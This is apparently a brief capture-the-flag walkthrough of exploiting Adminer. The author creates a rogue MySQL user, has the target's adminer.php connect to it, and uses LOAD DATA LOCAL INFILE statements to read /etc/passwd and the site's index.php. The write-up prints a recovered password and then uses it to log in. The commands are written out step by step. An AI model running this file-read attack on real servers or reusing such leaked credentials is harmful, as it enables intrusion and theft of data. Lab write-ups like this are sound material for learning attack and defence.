4 adminer-php

Enumerate adminer.php

adminer.php

Using https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Create User on mysql

  • CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';

  • GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';

  • FLUSH PRIVILEGES;

adminer.php login
adminer.php successful login
  • Create database pwn

  • Create table data with field out as varchar(256)

Trying to read /etc/passwd

load data local infile "/etc/passwd"
into table pwn.data
fields terminated by "\n";
adminer.php successful login

Trying to read /var/www/html/index.php

load data local infile "/var/www/html/index.php"
into table pwn.data
fields terminated by "\n";
adminer.php successful login

We see different password

adminer.php successful login

Using waldo:&<h5b~yK3F#{PaPB&dA}{H>

adminer.php successful login

Last updated